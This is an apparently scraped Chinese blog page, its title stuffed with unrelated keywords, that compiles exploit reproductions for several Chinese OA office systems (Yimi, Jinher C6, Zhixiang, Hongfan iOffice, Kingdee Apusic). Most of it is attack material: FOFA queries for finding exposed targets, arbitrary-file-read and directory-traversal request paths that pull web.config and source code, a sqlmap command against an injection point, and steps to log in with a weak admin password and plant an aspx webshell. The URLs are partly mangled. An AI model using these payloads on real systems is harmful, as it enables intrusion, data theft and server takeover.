ftp下的内部网站建设,智慧团建pc版官网,wordpress调取列表页,手机微网站平台一米OA getfile.jsp 任意文件读取漏洞
原文链接 漏洞复现 一米OA getfile.jsp 任意文件读取漏洞
一米OA协同办公系统,集成了OA办公自动化系统、手机客户端、专业报表工具,为全国千万企业用户提供全功能、性价比高的OA软件。一米OA getfile.jsp文件存在任意文件读取漏洞攻击者通过漏洞可获取敏感信息。 漏洞复现
fofaapp一米OA 执行如下POC可以读取源码文件
/public/getfile.jsp?user1propactivexfilename../public/getfileextnamejsp 金和OA C6 download.jsp 任意文件读取漏洞
原文链接https://www.cnblogs.com/hmesed/p/16285307.html fofa appJinher-OA 漏洞产生文件为 download.asp POC构造 http//:x.x.x.x/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename/c6/web.config 随后就下载一个Web.config文件 金和OA C6 EditMain.aspx 后台文件写入漏洞
原文漏洞复现 金和OA C6 EditMain.aspx 后台文件写入漏洞
金和OA系统是专业oa协同办公管理平台,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。金和OA C6 EditMain.aspx 存在任意文件写入漏洞通过漏洞可以写入恶意文件获取服务器权限。
漏洞复现
fofaapp金和网络-金和OA
1.使用弱密码登录admin:000000。访问写入大马路径写入aspx大马-点击保存。
写入大马/C6/JHSoft.Web.Portal/EditMain.aspx?id1.aspx 2.访问大马
/C6/JHSoft.Web.Portal/Default/1.aspx 致翔OA msglog.aspx SQL注入漏洞
原文链接漏洞复现 致翔OA msglog.aspx SQL注入漏洞
致翔OA是集成多个行业应用功能的OA协同办公平台,其核心机制是创新与合作,秉承开放的精神,可以提供嵌入式的OA系统开发支持。致翔OA msglog.aspx文件存在SQL注入漏洞攻击者通过漏洞可获取敏感信息。 漏洞复现
fofaapp致翔软件-致翔OA
1.注入点如下
python sqlmap.py -u http://{{Hostname}}/mainpage/msglog.aspx?user1 --dbs 红帆OA ioFileExport.aspx 任意文件读取漏洞
原文漏洞复现 红帆OA ioFileExport.aspx 任意文件读取漏洞
历经十几年的发展红帆iOffice.net从最早满足医院行政办公需求传统OA到目前融合了卫生主管部门的管理规范和众多行业特色应用是目前唯一定位于解决医院综合业务管理的软件是最符合医院行业特点的医院综合业务管理平台是成功案例最多的医院综合业务管理软件。红帆iOffice.net ioFileExport.aspx处存在任意文件读取攻击者可以从其中获取网站路径和源码等敏感信息进一步攻击。 0x03 漏洞复现
fofaapp红帆-ioffice
1.执行POC得到配置文件、源码等信息
/ioffice/prg/set/iocom/ioFileExport.aspx?url/ioffice/web.configfilenametest.txtContentTypeapplication/octet-stream/ioffice/prg/set/iocom/ioFileExport.aspx?url/ioffice/Login.aspxfilenametest.txtContentTypeapplication/octet-stream 金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
原文漏洞复现 金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
金蝶Apusic应用服务器是国内第一个通过J2EE测试认证的应用服务器全球第四家获得JavaEE 5.0认证授权的产品完全实现J2EE等企业计算相关的工业规范及标准代码简洁优化具备了数据持久性、事务完整性、消息传输的可靠性、集群功能的高可用性、以及跨平台的支持等特点。金蝶Apusic应用服务器 server_file处存在目录遍历漏洞攻击者可以从其中获取网站路径等敏感信息进一步攻击。 0x03 漏洞复现
fofaappApusic-公司产品 title欢迎使用Apusic应用服务器
1.执行POC得到网站路径
/admin/protected/selector/server_file/files?folder/ 2.nuclei验证脚本已发表于知识星球
nuclei.exe -t JindieOA_server_file_directory_traversal.yaml -l subs.txt -stats